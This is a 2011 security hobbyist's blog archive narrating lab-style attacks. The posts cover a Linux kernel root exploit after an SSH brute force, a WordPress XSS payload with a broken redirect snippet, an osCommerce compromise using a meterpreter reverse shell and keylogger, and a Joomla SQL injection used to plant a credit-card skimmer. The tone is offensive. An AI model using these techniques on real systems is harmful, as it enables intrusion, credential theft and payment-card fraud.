Wednesday, December 7, 2011

Ubuntu Server Exploit (Local Privilege Escalation)

Today we're gonna talk about an "old" vulnerability discovered by Dan Rosenberg in the linux kernel. This bug affect versions previous than 2.6.38 and permit to an user with low privileges to gain root access.

Link to exploit: Linux Kernel<= 2.6.37 Local Privilege Escalation

The text below is taked from exploit description.
* This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit.  If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok().  However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
 * fairly benign as a local denial-of-service.  It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 * CVE-2010-3850
 * -------------
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.

- Victim: (with ubuntu server 10.04 kernel 2.6.32 )
- Attacker: (with backbox 2)

This forum has installed the lastest version of phpBB3 cms so there is no way to take advantage of some flaws.

To start we check the name of the forum administrator and if we are lucky will be the same for the ssh account. This time we are lucky and after a simple bruteforce attack with hydra we got john's password.

After the successfull attack we login and we try to see if the kernel version is vulnerable and if there is gcc (by default all linux distribution has it ). Now it's time to upload the exploit throught sftp and execute it. After got the root account we can inject javascript code in some phpbb3 files to spread malware as few months ago has happened to or just install a rootkit.

Sunday, November 6, 2011

Have fun with scammers

A couple of days ago i've received this e-mail:

After reading it i decided to go on and have some fun with him so i've replied and after one day i get the response.

To convince me he attached four pictures regarding the flat. Here is the living room and my future bedroom.

Anyone can see that this picture is from a five stars hotel but to be really sure i used google search by image and what i found ? that these images are from an hotel in the center of Milan.

Things are getting interesting so i decided to know how can i get this awesome flat.

His response.

Now it's time to send him my personal information in a pdf.

After this e-mail i haven't got any response, maybe he is angry with me but i don't know why :(.

Tuesday, November 1, 2011

Wordpress XSS Vulnerability + IE 8 Exploit

The 30th December of 2010 a guy named sneak reported a persistent XSS vulnerability that affect the popular blog cms wordpress <= 3.0.3.

The problem is located into the kses.php file which is the HTML sanitation library. If we type a link with the href attribute written in capital letters this library don't filter the content properly.

<a HREF="javascript:alert(0)">CLICK HERE</a>

If we post a comment this tag will be accepted as a common link. With this vulnerability we can craft a piece of code that can steal cookies, redirected to other sites etc....

This video shows you how it can be easy for everyone to craft an evil comment to redirect the victim to a server where there is an exploit for Internet Explorer 8 (CVE-2010-3971).

Our evil code:
var s = navigator.userAgent;

if('MSIE 8.0') != -1 ) {
    window.location = "";

Reference and more detailed information:
- Sneak blog 
- Metasploit Unleashed
- Javascript Obfuscator

Tuesday, October 4, 2011

OsCommerce Malware Infection

Three months ago is started a huge site infection campaign with lens oscommerce, a famous cms for medium/little on-line stores. This cms suffers of few vulnerabilities that can lead an attacker to upload files and execute remote code.

-  osCommerce 2.2 Remote File Upload Vulnerability
-  osCommerce authentication bypass
-  osCommerce 2.2 Arbitrary PHP Code Execution
-  osCommerce 2.3.1 Remote File Upload Vulnerability

Today (4/10/2011) the total number of infected sites is 830,000 but two months ago was 8 million.

In some compromised sites the attacker has left the webshell.

After uploading a backdoor the attacker edit the home page and add a script/iframe tag that load multiple browser exploits.

Exploits used:
- IE 6 Remote Code Execution
- Java Runtime Environment Remote Code Execution Vulnerability
- Microsoft Windows Help
- Adobe Reader and Acrobat 8.x

After successful exploitation a malware is downloaded and executed.


- ----> Attacker with BackBox 2.0
- -----> Victim with osCommerce 2.2
- ----> Malware host

- jquery.js (IE 6 Remote Code Execution CVE-2006-0003)
- windows.exe (windows calculator with reverse meterpreter tcp payload)

What i want to show you is how probably an attacker has infected a site running an old copy of osCommerce to spread malware. These are the steps to follow:

1- Find a place where we can host our malicious code so we need to find a server with weak ssh/ftp password (

2- Create our malware injecting a meterpreter reverse payload into calc.exe and encoding it 3 times using shikata_ga_nai.

3- Waiting the connection back.

4- Upload malware and exploit to

5- Waiting for a victim.

6- Do what you want.

After obtaining the meterpreter shell we start the keylogger to steal gmail login credentials.

Reference and more detailed information:
-  Willysycom mass injection ongoing
- Metasploit Unleashed

Wednesday, September 21, 2011

Wordpress TimThumb Exploit (Remote Code Execution)

A lot of wordpress themes use timthumb script to resize images. From version 1.15 to 1.33 timthumb allow to external domains such as to display remote images on your website .

More detailed information here:
- Wordpress timthum hack
- Zero Day vulnerability in many wordpress themes

- TimThumb version used
- Vulnerable wordpress theme
- List of vulnerable wordpress themes

Tuesday, September 20, 2011

Joomla Plugin Exploit + PHP Malware

Garden Store has a vulnerable version (1.1.7) of virtuemart (Joomla plugin) and through a blind sql injection we can retrieve administrator credentials.

We edit the main template and place into the footer tag a simple piece of code properly obfuscated to get user's credit cards data.

- virtuemart exploit found by TecR0c & mr_me
- joomla hash cracker
- php obfuscator
- dopost source code
- getcc source code

Monday, September 19, 2011

Why this blog

Hi People,

I've decide to open this blog because not always i can explain all thought a video and the relative description box.

Remember... i'm NOT an expert or a regular blogger and i make videos only for fun.

I have also a twitter account @SecObscurity.

See you soon.